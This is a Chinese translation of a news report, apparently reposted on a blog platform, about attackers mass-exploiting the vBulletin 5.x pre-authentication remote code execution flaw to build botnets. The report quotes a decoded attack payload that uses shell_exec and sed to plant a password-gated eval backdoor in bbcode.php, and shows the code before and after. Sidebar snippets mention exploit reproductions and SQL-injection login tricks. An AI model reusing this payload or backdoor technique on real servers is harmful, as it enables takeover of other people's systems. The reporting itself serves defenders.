vBulletin中的高危漏洞正在被用来构建僵尸网络

AI权益加码!Claude Code、Cursor等20+工具免费用! 购周边限时加赠Coding Plan Lite,畅享主流AI工具!学习进阶更高效! 阅读详情

在这里插入图片描述

据悉,网络攻击者正在大规模利用由一个匿名者所披露的漏洞,它可让vBulletin服务器被非法接管。vBulletin是互联网上最流行的网站评论应用之一,而现在它正遭受严重的安全威胁,所有vBulletin服务器管理员应尽快安装好vBulletin开发者于周三上午发布的补丁。

周一,一位匿名人士发布了一份18行漏洞利用脚本,相当于正式对外披露这一漏洞。该漏洞可让未经身份验证的攻击者对版本5.0.0到5.5.4版本的vBulletin服务器远程执行恶意代码。目前来看,该漏利用方式简单,以至于一些批评人士将其描述为后门。

Tenable公司的研究人员Ryan Seguin表示:“这看起来就像超级简单的命令注入。攻击者发送payload,vBulletin就会运行命令,命令执行权限和vBulletin本身权限相同。

据Bad Packets security的研究员Troy Mursch的说法,攻击者正在使用僵尸网络大范围攻击脆弱服务器。在解码攻击请求后,内容如下:

widgetConfig[code]=echo shell_exec('sed -i \'s/eval(\$code);/if (isset(\$_REQUEST[\"epass\"]) \&\& \$_REQUEST[\"epass\"] == \"2dmfrb28nu3c6s9j\") { eval(\$code); }/g\' includes/vb5/frontend/controller/bbcode.php && echo -n exploited | md5sum'); exit;

以上payload涉及更改以下路径的代码:

includes/vb5/frontend/controller/bbcode.php

原始代码看起来如下所示:

function evalCode($code)
{
    ob_start();
    eval($code);
    $output = ob_get_contents();
    ob_end_clean();
    return $output;
}

在发送攻击请求后,代码会变成:

function evalCode($code)
{
    ob_start();
    if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") { eval($code); }
    $output = ob_get_contents();
    ob_end_clean();
    return $output;
}

Mursch表示,上述payload通过sed命令修改includes/vb5/frontend/controller/bbcode.php文件的内容,向文件添加后门,其中后门密码为2dmfrb28nu3c6s9j。因此,在后续的请求中,只有参数epass等于2dmfrb28nu3c6s9j,才会执行恶意代码,这就方便攻击者将其他漏洞利用者排除在外,以此构造大型僵尸网络。因其易用性,这个漏洞也被一些人视为后门。

已有一些vBulletin用户于本周三在vBulletin的官方支持页面上报告自己的网站已被攻击。其中一位用户表示在今天收到了一封来自服务器提供商的邮件,表示在网站上发现了恶意代码,而且服务器还发送了大量的垃圾邮件。另一个用户则报告说他的整个MySQL数据库被删除了。

虽然vBulletin是使用较为广泛的网站评论系统,但幸运的是,根据W3techs(一家互联网调查公司)的数据,5x版本占活跃的vBulletin服务器总数不到7%。尽管如此,根据网络上搜索的数据,超过10000个vBulletin网站可能都存在漏洞。

已被利用多年

据Zerodium exploit broker创始人兼首席执行官Chaouki Bekrar的说法,多年来,这一漏洞一直在暗中流传。

The recent vBulletin pre-auth RCE 0day disclosed by a researcher on full-disclosure looks like a bugdoor, a perfect candidate for @PwnieAwards 2020\. Easy to spot and exploit.

Many researchers were selling this exploit for years. @Zerodium customers were aware of it since 3 years

— Chaouki Bekrar (@cBekrar) September 25, 2019

他在推特上写道:“多年来,许多研究人员一直在兜售这个漏洞。Zerodium的客户从3年前就意识到了这一点。”

另一个公开发布的利用脚本通过Shodan来查找存在漏洞的服务器,这扩大了漏洞的攻击范围。攻击者可以轻易生成vBulletin站点列表,然后逐一攻击。

该漏洞在默认设置下就可被任何未经身份验证的攻击者利用,而整个攻击流程只需要一个特殊的HTTP POST请求。所有未安装开发人员在周三上午发布的安全补丁的网站都不应该上线。著名网站Defcon就曾突然下线,几个小时后再次上线。网站创始人Jeff Moss表示,关闭网站正是为了避免被黑客攻击。

“我们立即对网站进行了测试,检查了日志之类的东西,没有发现试图攻击我们的流量。不过在我们重新上线后,立刻就发现了攻击流量。”

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场:https://nosec.org/home/detail/2993.html
来源:https://arstechnica.com/information-technology/2019/09/public-exploit-code-spawns-mass-attacks-against-high-severity-vbulletin-bug/

漏洞复现-vBulletin反序列化代码执行漏洞(CVE-2023-25135 利用此原理, 在vBulletin实例化vB_DataManager_User类,调用unserialize()方法检查searchprefs字段是否序列化时候,如果在searchprefs字段内容里面填写的是一个序列化的精心构造的类名,此时unserialize()方法会反序列化该类名的对象,整个过程中会调用到vB:: autoload(),从而引入加载以该类名分解构成的文件。即使这个类名是不真实存在的,它也只会返回一个__PHP_Incomplete_Class的实例,反序列化的过程不会崩溃。 阅读详情

相关推荐

vBulletin 5.x RCE(CVE-2019-16759 )复现

环境搭建 使用docker安装 docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808 docker exec -it e4fce6b1886c /bin/bash # update然后装vim apt-get update apt install vim # 改配置 vim /etc/apache2/apache2.conf# 最下面补这个配置 ServerName localhost:

玄道的网安博客 2483

vBulletin nual模板

vBulletin nual模板

CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE漏洞复现

1.vBulletin介绍 vBulletin 是世界上用户非常广泛的PHP论坛,很多大型论坛都选择vBulletin作为自己的社区。vBulletin高效,稳定,安全,在中国也有很多大型客户,比如蜂鸟网,51团购,海洋部落等在线上万人的论坛都用vBulletinvBulletin的官方网站是 http://www.vBulletin.com 它不是免费软件,但价格很低。 2.漏洞描述 vBu...

ranuy阮的博客 3029

vBulletin PHP论坛 v3.8.1 中文版

内容索引:PHP源码,论坛社区,vBulletin,PHP论坛  著名的vBulletin论坛,基于PHP+MySQL,它同样有着大气的界面,超强的管理功能。这是官方公布的最新版。安装时候需要先修改includes/config.new.php文件为config.php,并修改此文件内部的数据库联接信息,然后再运行安装程序,它的安装步骤较多,不过大都是直接点击下一步,安装起来也是挺快的。   不喜欢DISCUZ在互联网上重复度太高而影响搜索引擎收录的朋友,这一款绝对值得你去体验一下。

vbulletin论坛_不同的社区论坛类型:vBulletin vs PhpBB与SMF

vbulletin论坛According to Google definition and Wikipedia vBulletin(vB) is a commercial Internet forum software called vBulletin Solutions. Initially vBulletin was designed as forum script including fea...

culu1614的博客 1435

漏洞分析 | vBulletin反序列化代码执行漏洞(CVE-2023-25135)

vBulletin是一个强大、灵活的商业论坛程序(非开源)。在CVE-2023-25135漏洞中,vBulletin 允许未经过验证的远程攻击者通过触发反序列化的HTTP请求执行任意代码。

WangsuSecurity的博客 1257

一、Docker Ubuntu/Centos 在线/离线安装大全

本文介绍 常用Ubuntu、Centos版本的在线/离线安装的方式

青啊青斯博客 3429

记一次对Vulnerable Docker靶机渗透全过程

记一次对Vulnerable Docker靶机渗透全过程 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 今天我主要是使用VMware搭建一个Vulnerable Docker靶机环境,主要是为了练习使用。 完整找出所有flag只是基本任务,实现提权才是终极目标。我并不追求最快夺旗,而...

weixin_34072637的博客 838

vBulletin v3.0.3简体中文语言包:NewvBB全新上线

本文还有配套的精品资源,点击获取 简介:vBulletin v3.0.3是一款备受赞誉的论坛软件,虽为早期版本,但其经典界面和稳定性仍然吸引用户。此次发布的简体中文语言包(NewvBB)使得中国用户能够无障碍地使用论坛,享受丰富功能。该语言包提供了全面的中文翻译,确保用户能够方便地进行论坛管理和交流。文件内容包括论坛配置指南、存储管理说明、安装使用指南等,旨在帮助管理员和用...

weixin_33812391的博客 1110

vBulletin 远程代码执行漏洞复现(CVE-2025-48827/CVE-2025-48828)

此缺陷是由于不当使用 PHP 的 Reflection API 引起的,允许未经身份验证的攻击者调用受保护的控制器方法。通过注入构建的 <vb:if> 条件,通过 passthru($_POST[]) 执行任意 PHP 代码<param>,并通过对 ajax/render/ad_ 的第二个请求触发它<location>,攻击者可以以 Web 服务器用户的身份在服务器上运行任意命令。(CVE-2025-48827/CVE-2025-48828)

iSee857的博客 1184

vBulletin v2.2.5 标准汉化版:打造中文论坛社区的首选工具

vBulletin 是一款基于 PHP 和 MySQL 构建的成熟论坛系统,广泛应用于各类网络社区建设。v2.2.5 版本作为其早期稳定版本之一,具备良好的可扩展性和模块化架构,支持多语言、插件机制和模板引擎。该版本采用经典的三层架构设计:表现层(Template Engine)、业务逻辑层(PHP Classes)与数据访问层(DB Abstraction),核心组件包括init.php全局初始化模块、基础类库以及等功能脚本。

weixin_42610671的博客 957

45种攻入后台的方法(非原创,来自伟大的网络)

45种攻入后台的方法(非原创,来自伟大的网络)1、到Google搜索,site:cq.cn inurl:asp2、到Google,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!3、利用挖掘鸡和一个ASP木马:文件名是login.asp……路径组是/manage/关键词是went.asp用’or’='or’来登陆4、以下这个方法因为太多人做过,所以一些网站管理员对此都有防...

tiwsonchen的博客 6277

分享6款国内、国外开源PHP轻论坛CMS程序

随着移动互联网对于传统互联网的冲击,用户群更加注重信息的及时性和有效性的简便分享和获取,传统的社区模式经过多年的积累沉淀很深,尤其对于新兴的社区用户群和站长来说,如果需要挑战目前已经非常成熟的社区群还是比较困难的,而且没有足够的精力运营。相反,在国内外的流行社区群中,我们可以简单的目录式、专业知识类的社区比较出色。不论是注册、还是使用,都比较简单,轻便,我们习惯称作为轻论坛,在这篇文章中,老左整理

RainsSoft 6742

开源论坛程序 vBulletin 被曝严重且详情不明的漏洞,请立即修复

聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队如果你正在运行基于vBulletin软件的在线论坛,那么应确保已安装旨在修复严重漏洞的新补丁。。vBulletin 项目...

smellycat000的专栏 946

初识vbulletin

1.关于一些简单的变量的输入与输出 1){vb:var variable}输出数组的话就用{va:var variable.foo} 2){vb:raw variable}与{vb:var variable}类似,但是{vb:var variable}是讲HTML标签转义之后的,输出的是文本,不能使用CSS样式,但是安全 PS:普通变量的定义a)在render之前用$templater->r

qq_30007773的博客 539

vbulletin论坛_评论-vBulletin 3.0

vbulletin论坛vBulletin is commonly used to create interactive communities on a huge scale. This PHP-based bulletin board has been employed on some of the most well known Websites, including Linkin Park,...

culi4814的博客 868

CVE-2019-16759 vBulletin 5.x RCE 复现

我是使用docker复现的 环境搭建 自行搭建好docker 首先 查看防火墙状态: systemctl status firewalld.service 绿色为开启,开启时无法打开网页 执行关闭命令: systemctl stop firewalld.service 下载vBulletin 5.x RCE的docker docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808 查看docker Contain

weixin_41064688的博客 898

vBulletin 5.x 版本通杀远程代码执行漏洞复现

漏洞介绍 vBulletin中存在一个文件包含问题,可使恶意访问者包含来自 vBulletin 服务器的文件并且执行任意 PHP 代码。未经验证的恶意访问者可通过向index.php发出包含 routestring=参数的GET 请求,从而触发文件包含漏洞,最终导致远程代码执行漏洞,影响版本:vBulletin v5.x 漏洞原理 index.php页面发送GET请求去使用rout...

andiao1218的博客 1361
上一篇: Microsoft Office中URI劫持漏洞所导致的目录穿越
下一篇: USBSamurai——低于10美元可远程操控的USB线缆
NOSEC2019
博客等级 码龄7年 50粉丝 5原创
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值